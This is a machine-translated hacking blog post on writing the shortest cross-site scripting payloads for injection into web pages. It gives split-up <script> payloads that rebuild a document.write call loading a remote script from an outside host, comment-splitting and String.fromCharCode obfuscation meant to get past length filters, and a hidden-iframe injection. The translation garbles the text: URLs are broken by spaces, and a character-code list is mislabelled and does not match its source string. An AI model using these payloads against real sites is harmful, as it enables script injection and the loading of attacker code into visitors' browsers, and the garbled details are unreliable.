The shortest cross-site statement

What is the shortest cross-site statement? In the past, I would think like this: the normal cross-site code: <script> alert ("a") </script>, check, a total of 27 characters. Hey, but I saw an article on the Security Manual, crazy cross-site trip. here we mention another method of cross-site statements:
The following is a code snippet:
<Script> z = 'document. '</script>
<Script> z = z + 'write ("'</script>
<Script> z = z + '<script' </script>
<Script> z = z + 'src = ht '</script>
<Script> z = z + 'tp: // ww '</script>
<Script> z = z + 'W. pc010 '</script>
<Script> z = z + '. cn/1.' </script>
<Script> z = z + 'js> </SC '</script>
<Script> z = z + 'ript> ") '</script>
<Script> eval (z) </script>

Write these statements separately. As long as the written statements are displayed on a page, the code is finally introduced into variable z, and the total one is:
The following is a code snippet:
Document. write ("<script src = http://www.bkjia.com/1.js> </script> ")

Then run the z variable using the eval () function to execute the cross-site effect. Lcx commented in the article that the minimum valid code can be 26 letters, namely <script> z = z + 'd "'</script>, the minimum cross-site length is 26 characters. (When searching for information on the Internet today, we found that this method can contain only one character, namely: <script> z + = 'd "'</script>, replace = z + with + =. Hey, you can reduce the number of characters by 25 characters. However, it seems sad that I can only make breakthroughs on the foundation of others! :(). After replying to Jianxin, he turned back to a smiling face. I felt this guy had to find a shorter cross-site method. /Jmdcw/

Sure enough, today I opened the phpwind vulnerability line in the Ninth Issue of the Security Manual (for some reason, I haven't carefully read the book for a long time) and mentioned the shorter cross-site code, as follows:

The following is a code snippet:
<Script> open (/*
*/"Http: // 127 "/*
*/+ ". 0.0.1 /"/*
*/) </Script>

Here, the/* and */are the script's Annotation statements, which are submitted separately. The same condition is that the submitted code must be on a page, as shown in the following figure:

<Script> open (/* Invalid Content not displayed */"http: // 127"/* Invalid Content not displayed */+ ". 0.0.1/"/* Invalid Content not displayed */) </script>

So what is the shortest statement? It seems that <script> cannot be used separately. Apart from this, functions defined by the script, such as open, cannot run normally even after being separated./jmdcw,

First, set the top statement:
The following is a code snippet:
Document. write ("<script src = http://www.bkjia.com/1.js> </script>") to 10 hexadecimal characters:

100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116, 62,34, 41,59

Then add String with eval. fromCharCode to execute <script> eval (String. fromCharCode (100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116,) </script>
The following uses the Jianxin Method for Splitting:
<Script> /*
*/Eval (/*
*/String /*
*/./*
*/FromCharCode /*
*/(100 ,/*
*/111,99 ,/*
*/......./*
*/59 ))/*
*/</Script>

.... The longest statement is */fromCharCode/*, 16 characters, because this is the function name reserved by the script, it can be seen that the smallest cross-site statement is determined by the function used.
<Script>
Document. write ('<iframe src = "http://www.bkjia.com" style = "display: none"> ');
</Script>